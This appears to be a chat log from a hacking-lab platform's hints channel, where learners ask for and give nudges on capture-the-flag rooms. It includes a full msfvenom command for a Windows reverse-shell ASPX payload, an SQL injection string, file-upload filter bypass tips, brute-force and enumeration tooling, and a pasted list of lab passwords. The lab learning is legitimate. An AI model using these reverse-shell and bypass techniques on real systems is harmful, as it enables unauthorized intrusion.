
So I shouldn't set the lost?

#

Lhost*

trim haven
#

Have you done the metasploit room?

sacred inlet
#

No...

trim haven
#

Maybe try doing that so you can understand how to use metasploit :)

sacred inlet
#

Fair point

#

Thanks

trim haven
#

@dire zinc Have you found any suspicious files?

dire zinc
#

i got it using vim.basic

trim haven
#

Okie dokie

sullen seal
#

Hey guys im struggling with the owasp top 10 room, day 8, the rce remote execution, I have altered the encloded payload in the cookie, refreshed but Netcat isnt capturing anything, tried a few times

terse grove
#

@sullen seal I just did that one yesterday and it worked fine by following the hints/walkthrough. Did you make sure you followed closely, like only copying the base64 between the ' ' from the python output? I'm guessing it's something small like that

#

Otherwise I'm not sure, sorry

sullen seal
#

Thanks tat was my thought but I have been through it a few times following closely, I`m not using Kali for my linux machine so maybe there are differences there

copper token
#

@patent token should one of these two lists do the trick for the http directory brute force?
directory-list-2.3-medium.txt
directory-list-2.3-big.txt

white salmon
#

any hint for PE at jacob the boss?

oblique cliff
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

copper token
#

Sounds good

white salmon
#

i have tried everything man i know the rules

oblique cliff
#

if you know the rules why are you asking?

#

its not a matter of being stuck its a matter of respecting the room creator

patent token
#

Jo2020, 2.3-medium is good

shut pollen
#

Initial foothold of Theseus ?

#

The initial Cypher ?

stuck fractal
#

Suitguy has asked that no hints are given at any time for Theseus

wintry yarrow
#

Any hints on Year of the Rabbit room? I'm getting rick rolled. 🥺

oblique cliff
#

lol

#

burp suite @wintry yarrow

craggy pulsar
#

@white salmon

white salmon
#

ty

dusk imp
#

how in the world do I get LinEnum to allow me to easily read through it without cutting off half the console

#

more doesn't work. 😦

stuck fractal
#

Pipe into a file, up your terminal scrollback, more or less should work

dusk imp
#

well dur, pipe >_>

#

Thanks James.

wintry yarrow
#

burp suite
Alright, let me take a look thanks.

normal aurora
#

Hey guys. I'm trying to bruteforce an internal service on Internal, but it's taking a long time. Is the password in rockyou.txt?

hollow fox
#

any hints for the alice in wonderland teaParty file ?

normal aurora
#

When viewing search results, it's often useful to rename fields using user-provided tables of values. What command do we include within a search to do this?

#

I have an idea what it is but it won't accept it...

trim haven
#

any hints for the alice in wonderland teaParty file ?
@hollow fox do you still need a hint

mental ledge
#

Is it just me or the flag in owasp juice shop is not working lol

trim haven
#

Probably just you

mental ledge
#

Well a notification You successfully solved a challenge popped out and i just copied the flag and its says its incorrect

white salmon
#

it's you

#

don't need the error handeling flag

mental ledge
#

so its not a real flag?

white salmon
#

it is a real flag but not the flag you need

full owl
#

I get the same error in the last week

#

I just reboot the room and it works

mental ledge
#

Ok thanks 😄 love u guys

full owl
#

was like u searching for an other flag for 2hours lol

mental ledge
#

lol i just figured i needed to put ' or 1=1-- not choosing one lol

#

i thought I needed to choose only 1 haha xD

dire zinc
#

mr robot ctf

#

stuck finding flag 2

woven mirage
#

what have you tried?

dire zinc
#

gobuster on dirs and found few containing some sentences but thats bout it

woven mirage
#

have you found a login page?

dire zinc
#

found wp login and /admin which just keeps reloading the screen

woven mirage
#

in robots.txt you have a dict file, and you have a wp-login page

dire zinc
#

but no user?

woven mirage
#

i'm not sure, but i think wordpress says when your user isn't valid

#

so i think you can try to use wpscan or hydra to brute force users

dire zinc
#

so brute force users and dic attack password

oblique cliff
#

Brute force user first

sweet storm
#

Hi, i've been stuck with flag 16 from Linux challenges for quite some time. This flag is in a mounted file and i guess that I have to unmount it (once I find it) to get the flag. I used ||findmnt and mount commands|| to look for it but still nothing. What am I missing?

white salmon
#

you need to search your mnt folder

quartz ruin
#

hi

oblique cliff
#

hi

quartz ruin
#

i am suck with this step

#

my rev.aspx shell can't work in box

oblique cliff
#

its connected

quartz ruin
#

yh

#

i can't execute any cmd

humble cliff
#

Hi guys i am in OWASP room i am stuck in task number 7

white salmon
#

Which subject

oblique cliff
#

i can't execute any cmd
@quartz ruin type whoami

quartz ruin
oblique cliff
#

what was your msfvenom payload

quartz ruin
#

msfvenom -p windows/x64/shell/reverse_tcp LHOST=10.14.1.44 LPORT=1337 -f aspx -o rev.aspx

sweet storm
#

@white salmon My /mnt has nothing in it. Isn't this the foulder?

oblique cliff
#

there are several places that mounts go

#

@quartz ruin pretty sure staged payloads have to be caught with a metasploit multi/handler. Either do that, or use an unstaged payload

quartz ruin
#

ok @oblique cliff i will try with multihandler

#

thanks

#

not strength

#

xD

hollow fox
#

@trim haven yes pls

#

I was in school until now

oblique cliff
#

@quartz ruin you didnt set the correct payload

#

it need to match your msfvenom payload

quartz ruin
oblique cliff
#

look at your payload in metasploit and your payload from msfvenom

quartz ruin
#

i am so tired

oblique cliff
#

my man youre still trying to catch a staged payload with netcat

#

just generate an unstaged payload

#

windows/shell_reverse_tcp

#

also take a break and sleep

#

everyone needs sleep

#

even Blobs

wintry yarrow
#

Need hints on Year of the Rabbit room. ||So, far tried directory busting, anonymous ftp, analysed with Burp and found out about listening to the video and then in video it says I'm in wrong place.||

oblique cliff
#

navigate around and intercept every request with burp

#

particularly when they try to rick roll you

wintry yarrow
#

||This is happening whether you like it or not... The hint is in the video. If you're stuck here then you're just going to have to bite the bullet!<br>Make sure your audio is turned up!||

#

Got this thing.

oblique cliff
#

the other time they rick roll you lol

wintry yarrow
#

How many times they gonna rick roll me lol?

oblique cliff
#

i think just 2 🤔

wintry yarrow
#

||One in assets and one in style sheet?||

oblique cliff
#

theres somewhere where ||they redirect you to youtube to rickroll||

#

did you hit that yet

wintry yarrow
#

Yup. ||On style sheet theres a hidden path.||

trim haven
#

@trim haven yes pls
@hollow fox have you tried checking the code for the executable?

oblique cliff
#

perfection

#

open burp and then visit that link

wintry yarrow
#

Let me check.

hollow fox
#

No

oblique cliff
#

Check away

hollow fox
#

can you find it on the machine ?

wintry yarrow
#

||This is happening whether you like it or not... The hint is in the video. If you're stuck here then you're just going to have to bite the bullet!<br>Make sure your audio is turned up!||
Same I got this and they are saying to disable js.

#

Oh, is that a hint?

sweet storm
#

Still couldn't find anything. Can I get another hint?

oblique cliff
#

yes, but you dont need to do that

#

||look at the requests that you intercept when you click the link||

#

@sweet storm huh?

wintry yarrow
#

Oops, got it.

#

Thanks Blob.

oblique cliff
trim haven
#

can you find it on the machine ?
@hollow fox I mean if you’re able to run the file, are you able to download it?

wintry yarrow
#

||Now, I'm seeing a hot babe. :)||

hollow fox
#

lemme think

oblique cliff
#

||Now, I'm seeing a hot babe. :)||
@wintry yarrow 😍

#

thats what i like to hear

hollow fox
#

bc its in a user directory i do not know the pw for

#

only were able to execute it through priv esc

trim haven
#

If you can’t run it, get to the point where you can run it

hollow fox
#

I can

#

but I do not know how to scp it

#

bc for scp u need the user's pw

sweet storm
#

@oblique cliff I'm stuck on flag 16 from linux challenges and can't find a suspicious mount file. Can you give me a hint?

mental ledge
#

media

oblique cliff
#

mounts can be in /mnt /media or /dev (i think)

trim haven
#

bc for scp u need the user's pw
@hollow fox scp is not the only way for file transfer

wintry yarrow
#

"Ot9RrG7h2~24?\nEh, you've earned this. Username for FTP is ftpuser\nOne of these is the password:\nMou+56n%QK8sr\n1618B0AUshw1M\nA56IpIl%1s02u\nvTFbDzX9&Nmu?\nFfF~sfu^UQZmT\n8FF?iKO27b~V0\nua4W~2-@y7dE$\n3j39aMQQ7xFXT\nWb4--CTc4ww*-\nu6oY9?nHv84D&\n0iBp4W69Gr_Yf\nTS*%miyPsGV54\nC77O3FIy0c0sd\nO14xEhgg0Hxz1\n5dpv#Pr$wqH7F\n1G8Ucoce1+gS5\n0plnI%f0~Jw71\n0kLoLzfhqq8u&\nkS9pn5yiFGj6d\nzeff4#!b5Ib_n\nrNT4E4SHDGBkl\nKKH5zy23+S0@B\n3r6PHtM4NzJjE\ngm0!!EC1A0I2?\nHPHr!j00RaDEi\n7N+J9BYSp4uaY\nPYKt-ebvtmWoC\n3TN%cD_E6zm*s\neo?@c!ly3&=0Z\nnR8&FXz$ZPelN\neE4Mu53UkKHx#\n86?004F9!o49d\nSNGY0JjA5@0EE\ntrm64++JZ7R6E\n3zJuGL~8KmiK^\nCR-ItthsH%9du\nyP9kft386bB8G\nA-*eE3L@!4W5o\nGoM^$82l&GA5D\n1t$4$g$I+V_BH\n0XxpTd90Vt8OL\nj0CN?Z#8Bp69_\nG#h~9@5E5QA5l\nDRWNM7auXF7@j\nFw!if_=kk7Oqz\n92d5r$uyw!vaE\nc-AA7a2u!W2*?\nzy8z3kBi#2e36\nJ5%2Hn+7I6QLt\ngL$2fmgnq8vI*\nEtb?i?Kj4R=QM\n7CabD7kwY7=ri\n4uaIRX~-cY6K4\nkY1oxscv4EB2d\nk32?3^x1ex7#o\nep4IPQ_=ku@V8\ntQxFJ909rd1y2\n5L6kpPR5E2Msn\n65NX66Wv~oFP2\nLRAQ@zcBphn!1\nV4bt3*58Z32Xe\nki^t!+uqB?DyI\n5iez1wGXKfPKQ\nnJ90XzX&AnF5v\n7EiMd5!r%=18c\nwYyx6Eq-T^9\#@\nyT2o$2exo~UdW\nZuI-8!JyI6iRS\nPTKM6RsLWZ1&^\n3O$oC~%XUlRO@\nKW3fjzWpUGHSW\nnTzl5f=9eS&*W\nWS9x0ZF=x1%8z\nSr4*E4NT5fOhS\nhLR3xQV*gHYuC\n4P3QgF5kflszS\nNIZ2D%d58*v@R\n0rJ7p%6Axm05K\n94rU30Zx45z5c\nVi^Qf+u%0*q_S\n1Fvdp&bNl3#&l\nzLH%Ot0Bw&c%9\n" Is this some kind of encoding?

astral smelt
#

What room is this?

wintry yarrow
#

Year of the Rabbit.

oblique cliff
#

oh my lord

astral smelt
#

Oh ok I forgot how I did that

sweet storm
#

@oblique cliff Thanks a lot! blobheart Looked almost everywhere except media xD

wintry yarrow
#

No worries Blackout.

oblique cliff
#

uh i legitamtely dont remember encountering that

astral smelt
#

Yea me neither

wintry yarrow
#

I extracted the data from png using zsteg.

oblique cliff
#

that came out in a really weird format

astral smelt
#

IIRC there's a link or file and you have to listen to it to help you

oblique cliff
#

it shouldnt be like that

#

IIRC there's a link or file and you have to listen to it to help you
@astral smelt he passed that already

#

try something a bit simpler to get info from a file @wintry yarrow

astral smelt
#

Oh ok yea that room took me a while because of the rabbit holes that's probably why I forgot about it

wintry yarrow
#

I tried strings now and got the username.

#

Password is gibberish though.

astral smelt
#

You have to extract the image but not with zsteg

#

I remember now

wintry yarrow
#

Oh.

astral smelt
#

Have you got the name of the picture

wintry yarrow
#

||ftpuser|| is the username right?

astral smelt
#

yea

wintry yarrow
#

Yup.

#

Is that picture password?

#

*name

astral smelt
#

so have you done ||sed||

#

on the image

wintry yarrow
#

Nope. Let me try that.

#

I've never used sed before.

oblique cliff
#

I tried strings now and got the username.
@wintry yarrow what do you get when you do this on the picture?

#

that should give you everything you need

#

yea that gives you the list of possible passwords

#

also spoiler please

#

those are all possible passwords

#

do a little brute force action

wintry yarrow
#

Oh no I didn't one of these is password.

#

Sorry about that.

oblique cliff
#

Not a problem

#

#blobgang

wintry yarrow
astral smelt
#

When you cat or use strings on the file there are some that are the same but on two lines there is a potential password for the user you have to use ||sed|| with them two lines

wintry yarrow
#

||Got the password with Hydra.|| I don't know how to use sed, I'll look into that, thanks. blobheart

astral smelt
#

oh ok you're there

#

Ok so you're a bit ahead

#

Did you login with ftp?

wintry yarrow
#

Yup, just got logged in.

astral smelt
#

there is a file with creds did you get them?

wintry yarrow
#

Yup, I got them. I'm pretty confident I can get root now. Thank you for your help.

astral smelt
oblique cliff
#

im confident in you as well

#

you have the collective knowledge of #blobgang behind you 😤

humble cliff
#

i perform the same steps but its not working

hollow fox
#

@trim haven I hope its ok to ping you

I managed to get the the file onto my local machine , disassembled it and tried to do a bof

#

but failed

trim haven
#

I mean have you tried just doing nano file.name

solar lintel
#

hello there , i am stuck at kenobi room where i couldn't mount the files of kenobi home directory
using this command : mount ip_address:/var /mnt/kenobiNFS reply with this error :
mount: /mnt/kenboiNFS , bad option

trim haven
#

Without marking it an executable

solar lintel
#

even i have used mount.nfs and it doesn't work too

hollow fox
#

I did cat file > another file ; chmod 777 anotherfile

#

it runs exactly like it is supposed to

trim haven
#

If you download the file

#

You can manipulate the file

hollow fox
#

indeed

#

why should I ?

trim haven
#

Well if you can manipulate it

#

You can read the code

#

If you can read the code

#

You can understand how it works

hollow fox
#

wait what ?

stuck fractal
#

@solar lintel mount -t nfs iirc

hollow fox
#

smth like this is possible ?

trim haven
#

James could you assist with this? The room is Wonderland and this user is stuck on the teaParty executable. I’m trying to explain it without giving it away completely but I’m struggling to get my point across.

stuck fractal
#

You can reverse engineer stuff yes

#

You need to understand what the program foes before you can exploit it

#

Copy it off, throw it into R2 or Ghidra or R2dec or something

hollow fox
#

what about gdb ?

stuck fractal
#

If you want. But decompiling it and getting C is going to be better for you.

hollow fox
#

ohh ok

#

so decompile instead of trying to understand the asm ?

stuck fractal
#

Gonna be easier

hollow fox
#

ight thanks

solar lintel
#

@solar lintel mount -t nfs iirc
@stuck fractal i tried it although it doesn't work too

stuck fractal
#

Show the full command please

solar lintel
#

mount -t nfs ip_address:/var /mnt/kenobiNFS

hollow fox
#

just so I can use the right tool right away: should I use Ghidra or R2

#

not just for the challenge but in general

stuck fractal
#

That's a question only you can answer

#

Learn which one you like better

#

Use that one

hollow fox
#

ok

mental ledge
#

@humble cliff burpsuite

quartz ruin
#

how compile Printspoofer.exe

stuck fractal
#

You need visual studio. I'd recommend getting a pre-compiled version

wintry yarrow
#

Mayor's github have complied one.

oblique cliff
#

0day is also giving out 32 bit versions if you want that

sweet storm
#

I found that this command: ||find / -xdev -type f -print0 2>/dev/null | xargs -0 grep -E '^[a-z0-9]{32}$' 2>/dev/null|| solves flag26 from Linux Challenges. However, I can't understand what it is doing exactly. Can anyone explain me the reasoning behind this?

stuck fractal
sinful plaza
#

in the Attacktive Directory room how long is it going to take to enumerate valid usernames? with kerbrute

#

been on it more then 20min now

#

no valid usernames yet

oblique cliff
#

like 15 seconds

#

did you use the wordlist they provided

sinful plaza
#

yes

oblique cliff
#

show pic of the syntax you used

sinful plaza
#

kkk

#

||./kerbrute_linux_amd64 userenum --dc spookysec.local -d spookysec.local Userlist.txt -t 100||

oblique cliff
#

that should finish in like 30 seconds regardless of if it finds anything

#

can you communicate with the machine?

sinful plaza
#

yes

stuck fractal
#

I think technically the DC name is wrong here

oblique cliff
#

oh, yea it is

sinful plaza
#

really what i missing

#

--DC??

oblique cliff
#

did you enumerate with enum4linux?

#

it should tell you the DC name

stuck fractal
#

spookysec.local is the domain name

#

Not the DC name

sinful plaza
#

||THM-AD

||it should tell you the DC name
@oblique cliff

oblique cliff
sinful plaza
#

oh that is domain name

#

my bad

oblique cliff
#

not bad 🤷‍♂️

sinful plaza
#

not bad 🤷‍♂️
@oblique cliff really lol

oblique cliff
#

look at the enum4linux output again. The DC name will be there. You had the format right before, just wrong name

thorny obsidian
#

I know that is a recent room but can I have any hints in how to PE the room "Jacob the Boss"? I feel that i have tried everything...

sinful plaza
#

look at the enum4linux output again. The DC name will be there. You had the format right before, just wrong name
@oblique cliff sure thanks man

trim haven
#

Your comment has confused me

#

I'm not sure if it was a grammatical error or if that is how you meant it.

frail rain
#

that is how i meant it aha

#

well, uh

trim haven
#

but I do believe it belongs in feedback :p

frail rain
#

yeah sure aha

#

oh my, i didnt saw it was #roomhints , i thought i was talkin in General

oblique cliff
#

why are you a slightly disappointed potato? 😦

#

lets try to make you a satisfied and happy potato!

#

or, better yet, a tomato!

frail rain
#

I can make a list on why i am a slightly dissapointed potato

oblique cliff
#

if that will help you feel better then sure 😦

white salmon
#

Hey there please help me out here, I am struggling with the find command

zthlinux task 33

We've been through a lot in this section, and the challenge for this binary will reflect that. The first step is actually finding the binary, I'm not heartless though, so I'll give you the name of the binary. The name of the binary is shiba4.

according to me the command should be find / shiba4, but that finds everything, please help

trim haven
#

man find

white salmon
#

lol

#

Thanks

midnight spindle
#

Hey guys 🙂 , I'm on the OWASP Zap room and I'm stuck on one question ( my last one) " What does ZAP stand for?" Even if the question is really clear , I don't understand what kind of answer the room expect

#

after 5 try, I still don't get it ^^

trim haven
#

I mean

#

What are you not understanding?

midnight spindle
#

me ?

trim haven
#

Mhm

woven mirage
#

have you tried google?

trim haven
#

I want to help you understand, Dragonar

sullen raptor
trim haven
#

@sullen raptor deploy the machine, it should be in the “machine IP” header

woven mirage
#

RHOST is the ip of the machine being attacked

sullen raptor
#

oh my b

midnight spindle
#

I understood that Zap is like Burp suit , I understood that those soft are a security testing framework and we can use those to test web applications

#

what I don't understand is what is the exact answer the room expect ^^

trim haven
#

Are you aware of what an abbreviation is?

midnight spindle
#

or maybe I don't get something 😒

trim haven
#

Are you aware of what an abbreviation is?
@trim haven

midnight spindle
#

@trim haven thanks ! goti t !

trim haven
#

:)

midnight spindle
#

and my bad , I read the question too fast and was sure that I understood the question but not xD

#

anyway thanks for the help 🙂

#

sometime , we just need a "programmer duck " :p

white salmon
#

very confused where the user flag is in the RootMe machine, ive literally looked at every directory

#

also doing locate user.txt returns nothin

trim haven
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

trim haven
#

Specifically the last part

#

Sorry :/

white salmon
#

so i wont get hints

#

K

trim haven
#

Not for around 3-4 days

white salmon
#

ait

#

didnt kno

#

first time doin a new machine

trim haven
#

It's fine honestly

tall moat
#

I’m glad i’m not the only one getting trolled by that flag lol

white salmon
#

oh so i might not be stoopid well thats enough

#

lol

trim haven
#

Delete that please

white salmon
#

me?

trim haven
#

Yes

white salmon
#

which one

trim haven
#

We don't use that word here :/

white salmon
#

O

white salmon
#

i got the root flag before user

#

ok

tall moat
#

Lmao nice!

white salmon
#

i finally found the user i hate the box creator

sonic thorn
#

Can I possibly get a clue/hint for Task 43 in the "Learn Linux" room I need to get a flag from a file in the root users directory, my user has no sudo permissions, so am I bit stumped as to how to do that. It's probably something really easy that I haven't thought of embarassingly.

Edit: nvm just seen there is writeups, and it's what I suspected.

steady siren
#

can someone maybe give me a clue [Task 8] Bypassing Server-Side Filtering: File Extensions . able to upload files just they are not getting executed for the reverse shell

trim haven
#

Which room?

steady siren
#

know directory stored in

#

oh sorry Upload Vulnerabilities

trim haven
#

Is this the challenge task?

steady siren
#

no

#

annex.uploadvulns.thm

trim haven
#

Does it load for a few seconds or just instantly load?

steady siren
#

it wants a png which can be displayed so renamed shell shell.png

#

then traverse to directory says file cannot be displayed

stuck fractal
#

Probably isn't being treated as a PHP file then

steady siren
#

yes

stuck fractal
#

Might have to try something different

steady siren
#

tried .pngphp

trim haven
#

I see your issue

#

You need to use valid php extensions

steady siren
#

also tried .png%2500php

#

okay

trim haven
#

Are these valid php extensions? They seem completely wild to me

steady siren
#

had to bypass the filter whichdoes like php maybe try phtml next

pine hazel
#

In the room c4ptur3th3fl4g I'm trying to figure out what cipher type #7 is, any points in the right direction

oblique cliff
#

Task 1 #7?

pine hazel
#

Yea task1 #7 sorry

oblique cliff
#

I don’t actually remember so it’s not a spoiler but that looks like it’s been shifted in the ascii table

#

Bigger hint: ||looks like it’s been ROTated||

#

I could be wrong FYI that’s just what it looks like

pine hazel
#

It was, but how could you tell?

oblique cliff
#

The length of each set of characters looks like it doesn’t change the word size. So it’s probably a 1-to-1 match for the cipher. And then the weird characters and special symbols are usually indicative of ROT13 or 47 (whatever the other one is)

#

Cuz you usually don’t get special characters doing other transformations

iron swallow
#

Can someone assist me with the Network Service room task 7 #5

#

Trying to start the tcpdump but keep receiving an error message

solemn smelt
#

It would be helpful to see the error message as well as the command you’re running in a screenshot @iron swallow

iron swallow
#

Was in the process of uploading

solemn smelt
#

you’re not connected to the vpn

iron swallow
#

I am using the “my machine” that THM provide

solemn smelt
#

then use eth0 instead of tun0

#

all you’re doing is specifying which adaptor to use

mental ledge
#

for http-auth in hydra does it work with http-get or http-post-form?

wintry yarrow
#

post I believe.

white salmon
#

in upload vulns room on ||magic numbers section, i was able to upload the file but could not get it to work. have tried many different extensions like phtml, php5, phar etc.|| can someone point me in the right directions?

trim haven
#

I don’t think you need to use different file extensions

#

Just use a .php and change the magic bytes

white salmon
#

i did, but the file is interpreted as text and i get the code for the php shell

trim haven
#

Have you changed the header

white salmon
#

what do you mean? as you can see i've added the ||GIF bytes|| in the beginning

trim haven
#

Upload and intercept the request then screenshot burp please

white salmon
#

will do one sec

trim haven
#

Content type

#

Change it to text/x-php that might fix it

white salmon
#

oh yeah! hold on lemme try that

#

just forwarded that request with different content type

trim haven
#

Try again?? I’m not sure but I think that’s how I did it and it worked

white salmon
#

tried a bunch

#

i also removed and put the boundary parameter

trim haven
#

@inland onyx May I borrow your knowledge for a second?

white salmon
#

haha he's offline

#

i tried application/x-php as well

trim haven
#

Well there it fails

#

See how it says submit=failure

#

That wouldn’t work simply because it’s already the wrong file

white salmon
#

thats just the page i was on before

trim haven
#

Do you mind waiting 5 minutes for me to get out of bed and turn on my computer aha

white salmon
#

hahaha dont worry about it, i dont want it to become a hassle

trim haven
#

Nono I wanna help you solve this :p

white salmon
#

thanks

trim haven
#

@white salmon Which signature are you using?

white salmon
#

what do you mean? @trim haven

trim haven
#

Do you mind if I DM you?

white salmon
#

i dont mind at all

trim haven
#

Awesome

white salmon
#

everyone is allowed to DM me haha

trim haven
#

👀

inland onyx
#

@trim haven what's up?

trim haven
#

There's an issue with your upload vulns room

#

I think it may have just been the way Alchemist changed the hex bytes but I'm working it out :p

#

Sorry for the ping Muir

inland onyx
#

What's the issue?

trim haven
#

They did everything correct but the file was just outputting as text on the website

inland onyx
#

Which website?

trim haven
#

magic bytes http://magic.uploadvulns.thm

inland onyx
#

Hm, that's interesting. I would suspect it's a difference in how the shell was updated. That one should work exactly as it is in the tutorial section.

#

Just a straight php server

trim haven
#

Yeah, I've sent them my working file to see if it works. I was really confused hence the ping.

inland onyx
#

Fair

trim haven
#

Yes, my file worked.

inland onyx
#

Well, I'm off to see a Crannog, but lemme know how it goes

trim haven
#

Possibly just an issue with the bytes

inland onyx
#

Or that 😁

#

Yep

trim haven
#

Thank you anyway <3

inland onyx
#

Np

green sorrel
#

are we allowed to ask for hints on jacob yet

white salmon
#

@inland onyx it was an issue with the GIF bytes but now i ran into another issue with jewel...||burpsuite does not give me the response to the request...when it does, i can access the JS file in order to stop client side filtering|| i was actually able to upload the JS file but ||i had to put magic bytes at the beginning of the shell, and when i tried to execute it it wouldn't work because that messed up the script||

#

are we allowed to ask for hints on jacob yet
@green sorrel oh and i dont think so since its pretty new, wait a few days

inland onyx
#

@white salmon pretty sure I added a hint saying specifically not to do that

#

Node webservers don't react quite the same way as a PHP backed server would

white salmon
#

@inland onyx oh? well, how would i go about editing the JS file containing the restrictions?

inland onyx
#

I would suggest capturing it in Burpsuite and removing the filters. I was nice and left them de-obfuscated to make it easier

white salmon
#

thats what i did, i removed the filters as well. thing is, when i reload the site in order to capture the initial request, i ask it to intercept the response as well. when i forward that script i get a 304

inland onyx
#

Remind me to add in a hint about that

#

Research what 304 means @white salmon, then see what you can do to stop it from happening.

white salmon
#

oh so its supposed to be there @inland onyx ? i thought the room was borked kekw

inland onyx
#

@white salmon Strictly speaking it's not actually anything to do with the room. 304 means that the resource hasn't been changed since the last time you requested it -- i.e. an up to date version is stored in your browser's cache already. To save resource usage, your computer just reuses the version it has stored, rather than requesting a new copy.

white salmon
#

oh so thats why im not getting the html.. thanks muir!

green fossil
#

hi so i'm doing MR robot i downloaded the file that i blv contains the second flag, i made a python program that prints line with 32 length but there are too many what should i do ?

oblique cliff
#

check if there are duplicates in the file

#

also that file doesnt have the second flag

green fossil
#

oh XD

#

I checked for duplicates and doesn't print anything but thank imma do some more diging

white salmon
#

pls hint for rootme its not working 😭

hollow forum
#

Can i get a nudge for jacobtheboss privesc to root
cant even change directory
or get a rev shell

white salmon
#

upload this is not working i tried so many ways for php thing

#

im losing my mind on it liturally

hollow forum
#

@white salmon can i help you?

white salmon
#

yes

hollow forum
#

how

stuck fractal
#

Ellllf

#

New room

#

!rule 13